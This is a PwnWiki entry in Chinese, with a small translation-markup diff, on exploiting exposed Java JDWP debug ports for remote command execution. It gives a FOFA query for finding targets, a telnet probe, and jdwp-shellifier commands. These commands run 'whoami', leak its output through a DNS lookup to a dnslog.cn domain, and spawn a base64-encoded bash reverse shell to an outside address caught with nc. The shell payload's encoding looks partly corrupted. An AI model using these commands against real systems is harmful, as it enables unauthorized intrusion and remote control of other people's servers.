Difference between revisions of "JDWP 遠程命令執行漏洞"
From PwnWiki
(Marked this version for translation) |
|||
| Line 12: | Line 12: | ||
<translate> | <translate> | ||
| + | <!--T:1--> | ||
返回以下信息,表示漏洞存在。但是請注意,部分情況下無任何回顯也能成功利用。 | 返回以下信息,表示漏洞存在。但是請注意,部分情況下無任何回顯也能成功利用。 | ||
</translate> | </translate> | ||
| Line 27: | Line 28: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
使用Dnslog回顯: | 使用Dnslog回顯: | ||
</translate> | </translate> | ||
| Line 39: | Line 41: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
監聽機器執行: | 監聽機器執行: | ||
</translate> | </translate> | ||
Latest revision as of 10:07, 7 April 2021
FOFA
banner=”jdwp” && port="8000"
POC
telnet xxx.xxx.xxx.xxx 8000
返回以下信息,表示漏洞存在。但是請注意,部分情況下無任何回顯也能成功利用。
JDWP-Handsharke
EXP
https://github.com/IOActive/jdwp-shellifier
python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "whoami"
使用Dnslog回顯:
python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "ping http://.`whoami`.yoww7w.dnslog.cn"
Getshell
python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,YmFzaCAtaSA+JiAvfrV2L3RjcC8xOTIgrth4LjE4NS42Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}"
監聽機器執行:
nc -lvp 8888